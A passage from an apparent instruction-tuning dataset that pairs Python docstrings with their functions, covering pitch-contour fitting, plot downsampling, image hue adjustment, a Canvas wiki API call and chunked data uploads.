t_pitch = self.pitch[:break_indices[0, 0]]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[:break_indices[0, 0]]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[0, 1]
for i in xrange(1, len(break_indices)):
block_end = break_indices[i, 0]
t_pitch = self.pitch[block_start:block_end]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:block_end]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[i, 1]
if block_start != len(self.pitch)-1:
t_pitch = self.pitch[block_start:]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
label_start_offset = (window-hop)/2
label_end_offset = label_start_offset+hop
#dataNew = np.zeros_like(data)
#dataNew[:, 0] = data[:, 0]
data_new = np.array([[0, 0]])
for data in data_blocks:
start_index = 0
while start_index < len(data)-1:
end_index = utils.find_nearest_index(data[:, 0], data[start_index][0]+window)
segment = data[start_index:end_index]
if len(segment) == 0:
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
segment_clean = np.delete(segment, np.where(segment[:, 1] == -10000), axis=0)
if len(segment_clean) == 0:
#After splitting into blocks, this loop better not come into play
#raise ValueError("This part of the block is absolute silence! Make sure block_thresh >= window!")
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
n_clean = len(segment_clean)
x_clean = np.matrix(segment_clean[:, 0]).reshape(n_clean, 1)
y_clean = np.matrix(segment_clean[:, 1]).reshape(n_clean, 1)
#return [x_clean, y_clean]
theta = utils.normal_equation(x_clean, y_clean)
#determine the start and end of the segment to be labelled
label_start_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_start_offset)
label_end_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_end_offset)
x_clean = x_clean[label_start_index:label_end_index]
#return x_clean
x_clean = np.insert(x_clean, 0, np.ones(len(x_clean)), axis=1)
newy = x_clean*theta
result = np.append(x_clean[:, 1], newy, axis=1)
data_new = np.append(data_new, result, axis=0)
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
return [data_new[:, 0], data_new[:, 1]] | Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region. | Below is the the instruction that describes the task:
### Input:
Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region.
### Response:
def fit_lines(self, window=1500, break_thresh=1500):
"""
Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region.
"""
window /= 1000
hop = window/3
break_thresh /= 1000
#cut the whole song into pieces if there are gaps more than break_thresh seconds
i = 0
break_indices = []
count = 0
while i < len(self.pitch):
if self.pitch[i] == -10000:
count = 1
start_index = i
while i < len(self.pitch) and self.pitch[i] == -10000:
count += 1
i += 1
end_index = i-1
if self.timestamps[end_index]-self.timestamps[start_index] >= break_thresh:
break_indices.append([start_index, end_index])
i += 1
break_indices = np.array(break_indices)
#In creating the data blocks which are not silences, note that we
# take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...]
# is break_indices, we take e1-s2, e2-s3 chunks and build data blocks
data_blocks = []
if len(break_indices) == 0:
t_pitch = self.pitch.reshape(len(self.pitch), 1)
t_timestamps = self.timestamps.reshape(len(self.timestamps), 1)
data_blocks = [np.append(t_timestamps, t_pitch, axis=1)]
else:
if break_indices[0, 0] != 0:
t_pitch = self.pitch[:break_indices[0, 0]]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[:break_indices[0, 0]]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[0, 1]
for i in xrange(1, len(break_indices)):
block_end = break_indices[i, 0]
t_pitch = self.pitch[block_start:block_end]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:block_end]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
block_start = break_indices[i, 1]
if block_start != len(self.pitch)-1:
t_pitch = self.pitch[block_start:]
t_pitch = t_pitch.reshape(len(t_pitch), 1)
t_timestamps = self.timestamps[block_start:]
t_timestamps = t_timestamps.reshape(len(t_timestamps), 1)
data_blocks.append(np.append(t_timestamps, t_pitch, axis=1))
label_start_offset = (window-hop)/2
label_end_offset = label_start_offset+hop
#dataNew = np.zeros_like(data)
#dataNew[:, 0] = data[:, 0]
data_new = np.array([[0, 0]])
for data in data_blocks:
start_index = 0
while start_index < len(data)-1:
end_index = utils.find_nearest_index(data[:, 0], data[start_index][0]+window)
segment = data[start_index:end_index]
if len(segment) == 0:
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
segment_clean = np.delete(segment, np.where(segment[:, 1] == -10000), axis=0)
if len(segment_clean) == 0:
#After splitting into blocks, this loop better not come into play
#raise ValueError("This part of the block is absolute silence! Make sure block_thresh >= window!")
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
continue
n_clean = len(segment_clean)
x_clean = np.matrix(segment_clean[:, 0]).reshape(n_clean, 1)
y_clean = np.matrix(segment_clean[:, 1]).reshape(n_clean, 1)
#return [x_clean, y_clean]
theta = utils.normal_equation(x_clean, y_clean)
#determine the start and end of the segment to be labelled
label_start_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_start_offset)
label_end_index = utils.find_nearest_index(x_clean, data[start_index, 0]+label_end_offset)
x_clean = x_clean[label_start_index:label_end_index]
#return x_clean
x_clean = np.insert(x_clean, 0, np.ones(len(x_clean)), axis=1)
newy = x_clean*theta
result = np.append(x_clean[:, 1], newy, axis=1)
data_new = np.append(data_new, result, axis=0)
start_index = utils.find_nearest_index(data[:, 0], data[start_index, 0]+hop)
return [data_new[:, 0], data_new[:, 1]] |
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Qt Override."""
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return to_qvariant(int(Qt.AlignHCenter | Qt.AlignVCenter))
return to_qvariant(int(Qt.AlignRight | Qt.AlignVCenter))
if role != Qt.DisplayRole:
return to_qvariant()
if orientation == Qt.Horizontal:
if section == CONTEXT:
return to_qvariant(_("Context"))
elif section == NAME:
return to_qvariant(_("Name"))
elif section == SEQUENCE:
return to_qvariant(_("Shortcut"))
elif section == SEARCH_SCORE:
return to_qvariant(_("Score"))
return to_qvariant() | Qt Override. | Below is the the instruction that describes the task:
### Input:
Qt Override.
### Response:
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Qt Override."""
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return to_qvariant(int(Qt.AlignHCenter | Qt.AlignVCenter))
return to_qvariant(int(Qt.AlignRight | Qt.AlignVCenter))
if role != Qt.DisplayRole:
return to_qvariant()
if orientation == Qt.Horizontal:
if section == CONTEXT:
return to_qvariant(_("Context"))
elif section == NAME:
return to_qvariant(_("Name"))
elif section == SEQUENCE:
return to_qvariant(_("Shortcut"))
elif section == SEARCH_SCORE:
return to_qvariant(_("Score"))
return to_qvariant() |
def downsample_grid(a, b, samples, ret_idx=False):
"""Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa`
"""
# fixed random state for this method
rs = np.random.RandomState(seed=47).get_state()
samples = int(samples)
if samples and samples < a.size:
# The events to keep
keep = np.zeros_like(a, dtype=bool)
# 1. Produce evenly distributed samples
# Choosing grid-size:
# - large numbers tend to show actual structures of the sample,
# which is not desired for plotting
# - small numbers tend will not result in too few samples and,
# in order to reach the desired samples, the data must be
# upsampled again.
# 300 is about the size of the plot in marker sizes and yields
# good results.
grid_size = 300
xpx = norm(a, a, b) * grid_size
ypx = norm(b, b, a) * grid_size
# The events on the grid to process
toproc = np.ones((grid_size, grid_size), dtype=bool)
for ii in range(xpx.size):
xi = xpx[ii]
yi = ypx[ii]
# filter for overlapping events
if valid(xi, yi) and toproc[int(xi-1), int(yi-1)]:
toproc[int(xi-1), int(yi-1)] = False
# include event
keep[ii] = True
# 2. Make sure that we reach `samples` by adding or
# removing events.
diff = np.sum(keep) - samples
if diff > 0:
# Too many samples
rem_indices = np.where(keep)[0]
np.random.set_state(rs)
rem = np.random.choice(rem_indices,
size=diff,
replace=False)
keep[rem] = False
elif diff < 0:
# Not enough samples
add_indices = np.where(~keep)[0]
np.random.set_state(rs)
add = np.random.choice(add_indices,
size=abs(diff),
replace=False)
keep[add] = True
assert np.sum(keep) == samples, "sanity check"
asd = a[keep]
bsd = b[keep]
assert np.allclose(a[keep], asd, equal_nan=True), "sanity check"
assert np.allclose(b[keep], bsd, equal_nan=True), "sanity check"
else:
keep = np.ones_like(a, dtype=bool)
asd = a
bsd = b
if ret_idx:
return asd, bsd, keep
else:
return asd, bsd | Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa` | Below is the the instruction that describes the task:
### Input:
Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa`
### Response:
def downsample_grid(a, b, samples, ret_idx=False):
"""Content-based downsampling for faster visualization
The arrays `a` and `b` make up a 2D scatter plot with high
and low density values. This method takes out points at
indices with high density.
Parameters
----------
a, b: 1d ndarrays
The input arrays to downsample
samples: int
The desired number of samples
remove_invalid: bool
Remove nan and inf values before downsampling
ret_idx: bool
Also return a boolean array that corresponds to the
downsampled indices in `a` and `b`.
Returns
-------
dsa, dsb: 1d ndarrays of shape (samples,)
The arrays `a` and `b` downsampled by evenly selecting
points and pseudo-randomly adding or removing points
to match `samples`.
idx: 1d boolean array with same shape as `a`
Only returned if `ret_idx` is True.
A boolean array such that `a[idx] == dsa`
"""
# fixed random state for this method
rs = np.random.RandomState(seed=47).get_state()
samples = int(samples)
if samples and samples < a.size:
# The events to keep
keep = np.zeros_like(a, dtype=bool)
# 1. Produce evenly distributed samples
# Choosing grid-size:
# - large numbers tend to show actual structures of the sample,
# which is not desired for plotting
# - small numbers tend will not result in too few samples and,
# in order to reach the desired samples, the data must be
# upsampled again.
# 300 is about the size of the plot in marker sizes and yields
# good results.
grid_size = 300
xpx = norm(a, a, b) * grid_size
ypx = norm(b, b, a) * grid_size
# The events on the grid to process
toproc = np.ones((grid_size, grid_size), dtype=bool)
for ii in range(xpx.size):
xi = xpx[ii]
yi = ypx[ii]
# filter for overlapping events
if valid(xi, yi) and toproc[int(xi-1), int(yi-1)]:
toproc[int(xi-1), int(yi-1)] = False
# include event
keep[ii] = True
# 2. Make sure that we reach `samples` by adding or
# removing events.
diff = np.sum(keep) - samples
if diff > 0:
# Too many samples
rem_indices = np.where(keep)[0]
np.random.set_state(rs)
rem = np.random.choice(rem_indices,
size=diff,
replace=False)
keep[rem] = False
elif diff < 0:
# Not enough samples
add_indices = np.where(~keep)[0]
np.random.set_state(rs)
add = np.random.choice(add_indices,
size=abs(diff),
replace=False)
keep[add] = True
assert np.sum(keep) == samples, "sanity check"
asd = a[keep]
bsd = b[keep]
assert np.allclose(a[keep], asd, equal_nan=True), "sanity check"
assert np.allclose(b[keep], bsd, equal_nan=True), "sanity check"
else:
keep = np.ones_like(a, dtype=bool)
asd = a
bsd = b
if ret_idx:
return asd, bsd, keep
else:
return asd, bsd |
def upload_data(job, master_ip, inputs, hdfs_name, upload_name, spark_on_toil):
"""
Upload file hdfsName from hdfs to s3
"""
if mock_mode():
truncate_file(master_ip, hdfs_name, spark_on_toil)
log.info("Uploading output BAM %s to %s.", hdfs_name, upload_name)
call_conductor(job, master_ip, hdfs_name, upload_name, memory=inputs.memory)
remove_file(master_ip, hdfs_name, spark_on_toil) | Upload file hdfsName from hdfs to s3 | Below is the the instruction that describes the task:
### Input:
Upload file hdfsName from hdfs to s3
### Response:
def upload_data(job, master_ip, inputs, hdfs_name, upload_name, spark_on_toil):
"""
Upload file hdfsName from hdfs to s3
"""
if mock_mode():
truncate_file(master_ip, hdfs_name, spark_on_toil)
log.info("Uploading output BAM %s to %s.", hdfs_name, upload_name)
call_conductor(job, master_ip, hdfs_name, upload_name, memory=inputs.memory)
remove_file(master_ip, hdfs_name, spark_on_toil) |
def removeChildren(self, children):
'''
removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed.
'''
ret = []
for child in children:
ret.append( self.removeChild(child) )
return ret | removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed. | Below is the the instruction that describes the task:
### Input:
removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed.
### Response:
def removeChildren(self, children):
'''
removeChildren - Remove multiple child AdvancedTags.
@see removeChild
@return list<AdvancedTag/None> - A list of all tags removed in same order as passed.
Item is "None" if it was not attached to this node, and thus was not removed.
'''
ret = []
for child in children:
ret.append( self.removeChild(child) )
return ret |
def single_input(self, body):
"""single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE"""
loc = None
if body != []:
loc = body[0].loc
return ast.Interactive(body=body, loc=loc) | single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE | Below is the the instruction that describes the task:
### Input:
single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE
### Response:
def single_input(self, body):
"""single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE"""
loc = None
if body != []:
loc = body[0].loc
return ast.Interactive(body=body, loc=loc) |
def rcts(self, command, *args, **kwargs):
'''General function for applying a rolling R function to a timeserie'''
cls = self.__class__
name = kwargs.pop('name','')
date = kwargs.pop('date',None)
data = kwargs.pop('data',None)
kwargs.pop('bycolumn',None)
ts = cls(name=name,date=date,data=data)
ts._ts = self.rc(command, *args, **kwargs)
return ts | General function for applying a rolling R function to a timeserie | Below is the the instruction that describes the task:
### Input:
General function for applying a rolling R function to a timeserie
### Response:
def rcts(self, command, *args, **kwargs):
'''General function for applying a rolling R function to a timeserie'''
cls = self.__class__
name = kwargs.pop('name','')
date = kwargs.pop('date',None)
data = kwargs.pop('data',None)
kwargs.pop('bycolumn',None)
ts = cls(name=name,date=date,data=data)
ts._ts = self.rc(command, *args, **kwargs)
return ts |
def verify_path(self, mold_id_path):
"""
Lookup and verify path.
"""
try:
path = self.lookup_path(mold_id_path)
if not exists(path):
raise KeyError
except KeyError:
raise_os_error(ENOENT)
return path | Lookup and verify path. | Below is the the instruction that describes the task:
### Input:
Lookup and verify path.
### Response:
def verify_path(self, mold_id_path):
"""
Lookup and verify path.
"""
try:
path = self.lookup_path(mold_id_path)
if not exists(path):
raise KeyError
except KeyError:
raise_os_error(ENOENT)
return path |
def fetch_output(self, path, name, working_directory, action_type, output_type):
"""
Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targetting an older Pulsar server that didn't return statuses
allowing this to be inferred.
"""
if output_type in ['output_workdir', 'output_metadata']:
self._populate_output_path(name, path, action_type, output_type)
elif output_type == 'output':
self._fetch_output(path=path, name=name, action_type=action_type)
else:
raise Exception("Unknown output_type %s" % output_type) | Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targetting an older Pulsar server that didn't return statuses
allowing this to be inferred. | Below is the the instruction that describes the task:
### Input:
Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targetting an older Pulsar server that didn't return statuses
allowing this to be inferred.
### Response:
def fetch_output(self, path, name, working_directory, action_type, output_type):
"""
Fetch (transfer, copy, etc...) an output from the remote Pulsar server.
**Parameters**
path : str
Local path of the dataset.
name : str
Remote name of file (i.e. path relative to remote staging output
or working directory).
working_directory : str
Local working_directory for the job.
action_type : str
Where to find file on Pulsar (output_workdir or output). legacy is also
an option in this case Pulsar is asked for location - this will only be
used if targetting an older Pulsar server that didn't return statuses
allowing this to be inferred.
"""
if output_type in ['output_workdir', 'output_metadata']:
self._populate_output_path(name, path, action_type, output_type)
elif output_type == 'output':
self._fetch_output(path=path, name=name, action_type=action_type)
else:
raise Exception("Unknown output_type %s" % output_type) |
def show_page_courses(self, url, course_id):
"""
Show page.
Retrieve the content of a wiki page
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - course_id
"""ID"""
path["course_id"] = course_id
# REQUIRED - PATH - url
"""ID"""
path["url"] = url
self.logger.debug("GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/courses/{course_id}/pages/{url}".format(**path), data=data, params=params, single_item=True) | Show page.
Retrieve the content of a wiki page | Below is the the instruction that describes the task:
### Input:
Show page.
Retrieve the content of a wiki page
### Response:
def show_page_courses(self, url, course_id):
"""
Show page.
Retrieve the content of a wiki page
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - course_id
"""ID"""
path["course_id"] = course_id
# REQUIRED - PATH - url
"""ID"""
path["url"] = url
self.logger.debug("GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/courses/{course_id}/pages/{url}".format(**path), data=data, params=params, single_item=True) |
def put_edit(self, f, *args, **kwds):
"""
Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full
"""
self.put_nowait(functools.partial(f, *args, **kwds)) | Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full | Below is the the instruction that describes the task:
### Input:
Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full
### Response:
def put_edit(self, f, *args, **kwds):
"""
Defer an edit to run on the EditQueue.
:param callable f: The function to be called
:param tuple args: Positional arguments to the function
:param tuple kwds: Keyword arguments to the function
:throws queue.Full: if the queue is full
"""
self.put_nowait(functools.partial(f, *args, **kwds)) |
def convert_attrs_to_lowercase(obj: Any, attrs: Iterable[str]) -> None:
"""
Converts the specified attributes of an object to lower case, modifying
the object in place.
"""
for a in attrs:
value = getattr(obj, a)
if value is None:
continue
setattr(obj, a, value.lower()) | Converts the specified attributes of an object to lower case, modifying
the object in place. | Below is the the instruction that describes the task:
### Input:
Converts the specified attributes of an object to lower case, modifying
the object in place.
### Response:
def convert_attrs_to_lowercase(obj: Any, attrs: Iterable[str]) -> None:
"""
Converts the specified attributes of an object to lower case, modifying
the object in place.
"""
for a in attrs:
value = getattr(obj, a)
if value is None:
continue
setattr(obj, a, value.lower()) |
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
"""Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
"""
hsv = rgb_to_hsv(im)
if is_random:
hout = np.random.uniform(-hout, hout)
if is_offset:
hsv[..., 0] += hout
else:
hsv[..., 0] = hout
if is_clip:
hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots
rgb = hsv_to_rgb(hsv)
return rgb | Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__. | Below is the the instruction that describes the task:
### Input:
Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
### Response:
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
"""Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
"""
hsv = rgb_to_hsv(im)
if is_random:
hout = np.random.uniform(-hout, hout)
if is_offset:
hsv[..., 0] += hout
else:
hsv[..., 0] = hout
if is_clip:
hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots
rgb = hsv_to_rgb(hsv)
return rgb |
def get_mcc(self, ip):
''' Get mcc '''
rec = self.get_all(ip)
return rec and rec.mcc | Get mcc | Below is the the instruction that describes the task:
### Input:
Get mcc
### Response:
def get_mcc(self, ip):
''' Get mcc '''
rec = self.get_all(ip)
return rec and rec.mcc |
def upload_data(self, file_or_str, chunk_size=analyzere.upload_chunk_size,
poll_interval=analyzere.upload_poll_interval,
upload_callback=lambda x: None,
commit_callback=lambda x: None):
"""
Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10%
"""
if not callable(upload_callback):
raise Exception('provided upload_callback is not callable')
if not callable(commit_callback):
raise Exception('provided commit_callback is not callable')
file_obj = StringIO(file_or_str) if isinstance(
file_or_str, six.string_types) else file_or_str
# Upload file with known entity size if file object supports random
# access.
length = None
if hasattr(file_obj, 'seek'):
length = utils.file_length(file_obj)
# Initiate upload session
request_raw('post', self._data_path,
headers={'Entity-Length': str(length)})
else:
request_raw('post', self._data_path)
# Upload chunks
for chunk, offset in utils.read_in_chunks(file_obj, chunk_size):
headers = {'Offset': str(offset),
'Content-Type': 'application/offset+octet-stream'}
request_raw('patch', self._data_path, headers=headers, body=chunk)
# if there is a known size, and an upload callback, call it
if length:
upload_callback(offset * 100.0 / length)
upload_callback(100.0)
# Commit the session
request_raw('post', self._commit_path)
# Block until data has finished processing
while True:
resp = self.upload_status
if (resp.status == 'Processing Successful' or resp.status == 'Processing Failed'):
